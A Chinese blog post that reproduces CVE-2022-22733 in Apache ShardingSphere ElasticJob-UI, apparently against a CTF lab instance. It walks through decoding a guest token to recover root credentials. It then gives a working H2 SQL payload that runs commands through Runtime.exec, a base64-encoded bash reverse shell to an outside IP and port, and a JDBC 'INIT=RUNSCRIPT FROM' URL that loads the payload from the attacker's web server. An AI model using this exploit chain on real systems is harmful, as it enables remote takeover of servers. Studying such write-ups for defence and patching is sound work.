【CVE-2022-22733漏洞复现】

发布时间:2024年01月21日

Apache ShardingSphere ElasticJob-UI漏洞 漏洞编号:CVE-2022-22733

文档说明

本文作者:SwBack
创作时间:2024/1/21 19:19:19
知乎:https://www.zhihu.com/people/back-88-87
CSDN:https://blog.csdn.net/qq_30817059
百度搜索: SwBack

漏洞描述

Apache ShardingSphere ElasticJob-UI由于返回 token 中包含了管理员密码,攻击者可利用该漏洞在授权的情况下,构造恶意数据执行权限绕过攻击,最终获取服务器最高权限。

影响版本

Apache ShardingSphere ElasticJob-UI v3.0.0 及之前的版本

漏洞原理

Apache ShardingSphere ElasticJob-UI由于返回 token 中包含了管理员密码,攻击者可利用该漏洞在授权的情况下,构造恶意数据执行权限绕过攻击,最终获取服务器最高权限。

具体漏洞原理可以参考这篇文章

https://www.shangyexinzhi.com/article/4555060.html

漏洞复现

抓取token

通过burp进行登录请求抓包

采用游客账号guest guest

在这里插入图片描述

在这里插入图片描述

base64解密token

利用burp自带的解密直接base64解密token,获得账号密码均为root

在这里插入图片描述

构造恶意代码

CREATE ALIAS EXEC AS 'String shellexec(String cmd) throws java.io.IOException {Runtime.getRuntime().exec(cmd);return "Q";}';CALL EXEC ('bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xMTEuMTExLjExMS4xMTEvMTExMTEgMD4mMQ==}|{base64,-d}|{bash,-i}')

其中YmFzaCAtaSA+JiAvZGV2L3RjcC8xMTEuMTExLjExMS4xMTEvMTExMTEgMD4mMQ==为反弹shell base64加密代码。

解码之后为bash -i >& /dev/tcp/111.111.111.111/11111 0>&1

格式为:bash -i >& /dev/tcp/IP/PORT 0>&1

上传攻击服务器

将恶意代码保存为poc.sql,并在本地开启一个web服务,将恶意文件放到web目录下

在这里插入图片描述

访问测试:

在这里插入图片描述

攻击服务器开启监听

在这里插入图片描述

上传恶意文件

使用之前解密得到的root账号密码登录进系统。

访问Event trace data source -> +ADD

其中Name Username Password 随意

Driver 选择 org.h2.Driver

url 构造如下

jdbc:h2:mem:testdb;TRACE_LEVEL_SYSTEM_OUT=3;INIT=RUNSCRIPT FROM 'http://ip:port/poc.sql

这里的IP:PORT 为poc.sql 所在的web地址

例如我这里为

jdbc:h2:mem:testdb;TRACE_LEVEL_SYSTEM_OUT=3;INIT=RUNSCRIPT FROM 'http://ae59ad7a-70b7-4ff7-9721-45e96b5b1f21.node5.buuoj.cn:81/poc.sql'

如图所示

在这里插入图片描述

点击Test connect 连接成功

在这里插入图片描述

可以看到存在漏洞的服务器已经访问了我们放置POC 的地址。

在这里插入图片描述

成功反弹shell

在这里插入图片描述

在根目录发现flag.

在这里插入图片描述

复现总结

这个漏洞复现并不难,其中遇到的几个问题,.

一个是因为服务器防火墙问题导致一直无法访问.关闭防火墙即可。

还有一个是poc的代码复制时将CREATE 复制为了REATE 导致无法反弹shell。

需要细心检查一下

原创申明

本文由SwBack 原创文章, 如有问题,欢迎指正。

文章来源:https://blog.csdn.net/qq_30817059/article/details/135733642
本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。